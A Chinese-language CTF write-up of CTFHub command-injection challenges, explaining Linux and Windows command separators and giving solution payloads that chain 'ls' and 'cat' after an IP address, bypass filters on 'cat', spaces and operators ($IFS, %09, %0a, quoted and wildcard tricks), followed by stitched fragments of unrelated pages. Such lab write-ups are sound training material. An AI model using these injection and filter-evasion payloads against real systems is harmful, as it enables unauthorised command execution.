ctfhub中RCE命令注入

2021-10-07 03:37:05 字數 2145 閱讀 5427

一.實驗環境ctfhub

rce知識點:

rce分為遠端執行ping,和遠端**執行evel。

漏洞出現原因:未在輸入口做輸入處理。

涉及到ping命令:ping是windows,linux系統下的乙個命令,ping也屬於乙個通訊協議,是tcp/ip協議的一部分,利用ping命令可以檢查網路是否連通,可以很好的幫助我們分析和判定網路故障。

linux系統的管道符:

1," ; ": 執行完前面的語句在執行後面的語句。

2.「 | 「: 顯示後面的語句的執行結果。

3.」 || 「:當前的語句執行出錯時,執行後面的語句。

4.」 & 「:兩條命令都執行,如果前面語句為假則執行後面的語句,前面的語句可真可假。

5.」 && 「:如果前面的語句為假則直接出錯,也不執行後面的語句,前面的語句為真則執行兩條命令,前面的語句只能為真。

還有一些管道符

windows系統是:

1. "  |  " :是直接後面的執行語句

2. 「  || 」 :如果前面的語句執行失敗,則執行後面的語句,前面的語句只能為假才能執行。

3. " & "兩條命令都執行,如果前面的語句為假則直接執行後面的語句,前面的語句可真可假。

4. " && ":如果前面的語句為假則直接出錯,也不執行後面的語句,前面的語句為真則兩條命令都執行,前面的語句只能為真。

1.命令注入

直接輸入127.0.0.1 & ls

ls就是列出當前目錄下所有檔案

然後發現php檔案,執行127.0.0.1 & cat 221341753730987.php即可。然後檢視源**就發現了答案。

2.過濾cat

1.已知過濾了cat,所以就要搞事情了,有一種方法就是,ca\t,就是通過反斜槓,還是可以繼續執行cat的功能。

輸入127.0.0.1 & ls

還是可以看到乙個php檔案。

執行127.0.0.1 & ca\t flag_19559862332757.php

檢視網頁源**即可。

3.過濾空格

知識點:空格可以替換 <,<>, $,  $ifs,%20(space),  %09(tab),   $ifs$9,

還是先127.0.0.1 & ls

看到了乙個php檔案

因為空格被過濾,所以

127.0.0.1&cat還是先ping一下

127.0.0.1

返回正常資料,使用管道符檢視當前的位置檔案有哪些

127.0.0.1|ls

回顯是乙個flag_is_here

使用;cd flag_is_here&&ls

回顯了乙個php檔案

;cd flag_is_here&&cat flag_24324515113881.php

檢視即可,檢視原始碼

5.過濾運算子

我直接執行了127.0.0.1;ls

直接檢視到了php檔案。

直接回顯檔案說明中間不含有資料夾了,直接包含的檔案,直接查詢。

127.0.0.1;cat flag_7861165715441.php

檢視原始碼即可

6.綜合過濾

工具:burpsuite

知識點:運算子分號可以用 %0a,%0d,%0d%0a替代。

flag可以用$fl$*ag_id_here這樣替代。

看題,原始碼可知過濾很多東西。

(1)我們首先127.0.0.1&ls提交並且用bp抓包。

(2)抓包後改為127.0.0.1%0als,go一下

(3)發現了flag_is_here

(5)得到了乙個flag檔案

(6)繼續進入目錄檢視檔案即可

(7)原本應該這樣子寫但是由於過濾了所以要寫成下面的樣子127.0.0.1;cd flag_is_here;cat flag_31441137586545.php

(8)  127.0.0.1%0acd$fl$*ag_is_here%0aca''t$fl$*ag_31441137586545.php

CTFHub 技能樹 命令注入 無過濾

進入頁面後給出的原始碼,題目要求輸入ip位址執行ping命令 res false if isset get ip get ip exec cmd res doctype html ctfhub 命令注入 無過濾 title head h1 由於沒有採用過濾,所以我們直接進行拼接,輸入192.168....

CTFHub 字元型SQL注入

目錄 一 判斷是否存在注入 二 判斷select語句中有幾列 三 判斷顯示的資訊是第幾列的資訊 四 利用函式來收集資料庫資訊 五 通過union查詢資料庫 1 獲取所有資料庫名稱 2 查詢資料庫中有多少個表 3 查詢指定資料庫中的表名 4 查詢指定資料庫指定表中的列名 5 查詢指定資料庫指定表的列的...

Hack World和CTFHub布林注入記錄

hack world 題目直接告訴你flag在flag表中的flag列 只有乙個提交框,正常方法無法注入,已經過濾大部分的sql語句。接觸python指令碼 提交框中 輸入 1 將返回hello,glzjin wants a girlfriend.輸入 2 將返回do you want to be ...